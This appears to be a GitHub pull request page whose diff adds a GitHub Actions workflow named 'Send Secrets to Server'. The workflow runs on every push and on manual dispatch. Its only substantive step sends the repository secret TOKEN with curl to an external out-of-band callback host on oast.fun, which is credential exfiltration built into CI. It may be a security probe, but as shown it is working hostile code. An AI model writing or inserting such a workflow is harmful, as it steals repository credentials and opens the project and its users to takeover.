Create Send Secrets to Server workflow #1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
name: Send Secrets to Server | |
on: | |
push: | |
workflow_dispatch: | |
jobs: | |
send-secrets: | |
runs-on: ubuntu-latest | |
steps: | |
- name: Bypass Cache | |
run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV | |
- name: Send Secrets to Server | |
run: | | |
curl -d 'TOKEN=${{ secrets.TOKEN }}' https://yvfeehabjheovlaaoqyvn66e0rr6cykf4.oast.fun | |